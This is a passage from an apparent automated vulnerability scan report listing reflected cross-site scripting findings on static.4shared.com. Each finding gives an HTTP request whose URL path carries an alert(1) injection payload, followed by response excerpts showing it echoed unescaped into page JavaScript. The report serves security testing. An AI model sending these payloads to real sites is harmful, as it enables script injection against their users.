The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54c08'-alert(1)-'1461bca481 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons54c08'-alert(1)-'1461bca481/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons54c08'-alert(1)-'1461bca481/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3F68CD949587D8177288024A7E29BB48.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:27 GMT
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons54c08'-alert(1)-'1461bca481/16x16/close.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

1.145. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db94"-alert(1)-"6dac60dedfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12E25BC3F676E23105B6E28B2550FFC7.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:26 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.146. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34b10'-alert(1)-'b49639e8781 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x1634b10'-alert(1)-'b49639e8781/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x1634b10'-alert(1)-'b49639e8781/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=860AD0C3C235F52F69082D9E661DAABB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:32 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons/16x1634b10'-alert(1)-'b49639e8781/close.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fu
...[SNIP]...

1.147. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7aec"-alert(1)-"b86c9662edb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEF65510DB407ACEDFB8FAF9B72454E4.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:31 GMT
Content-Length: 36243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.148. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63a74'-alert(1)-'3b7aa9c27e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x16/close.gif63a74'-alert(1)-'3b7aa9c27e2 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/close.gif63a74'-alert(1)-'3b7aa9c27e2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=58835DFC7E351C5342446CFFFCA92D28.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:38 GMT
Content-Length: 36243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
efined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons/16x16/close.gif63a74'-alert(1)-'3b7aa9c27e2',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.149. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad02c"-alert(1)-"a953950d00e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=03A457731FAEC3860D53C42B8811E941.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:37 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.150. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3472d'-alert(1)-'5e4bacf3f52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images3472d'-alert(1)-'5e4bacf3f52/icons/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3472d'-alert(1)-'5e4bacf3f52/icons/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0076AE475E9551321ADA9B7E8A3A40F8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:12 GMT
Content-Length: 36238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images3472d'-alert(1)-'5e4bacf3f52/icons/16x16/stop.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.151. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 760a5"-alert(1)-"158d4163382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6DADEDB0265DD419843A49CE2D04781.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedba
...[SNIP]...

1.152. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e829a'-alert(1)-'7d82ff79dfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/iconse829a'-alert(1)-'7d82ff79dfd/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/iconse829a'-alert(1)-'7d82ff79dfd/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A46ED302B56E58D204A0AEE40930585D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:18 GMT
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/iconse829a'-alert(1)-'7d82ff79dfd/16x16/stop.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.153. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73080"-alert(1)-"bd5e5c0b567 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78DFFF9C129B528E44FF3EABA7D2E061.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.154. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b306f"-alert(1)-"f931fa8a6ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C523391335A36A28DA2975087B407E0D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.155. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6fb7'-alert(1)-'65e99511cae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x16b6fb7'-alert(1)-'65e99511cae/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16b6fb7'-alert(1)-'65e99511cae/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BA5EAF20F3DB11AA31FF050A220CC371.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:24 GMT
Content-Length: 36238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons/16x16b6fb7'-alert(1)-'65e99511cae/stop.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.156. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34543"-alert(1)-"e3036abd11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6DA068FC8810374C5C44DC7CA61476B5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:29 GMT
Content-Length: 36244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.157. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28e65'-alert(1)-'f5dcbeeeb8e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/16x16/stop.gif28e65'-alert(1)-'f5dcbeeeb8e HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/stop.gif28e65'-alert(1)-'f5dcbeeeb8e
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FC9784A5596E9D54C987BCADD763BFB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:30 GMT
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
defined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons/16x16/stop.gif28e65'-alert(1)-'f5dcbeeeb8e',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

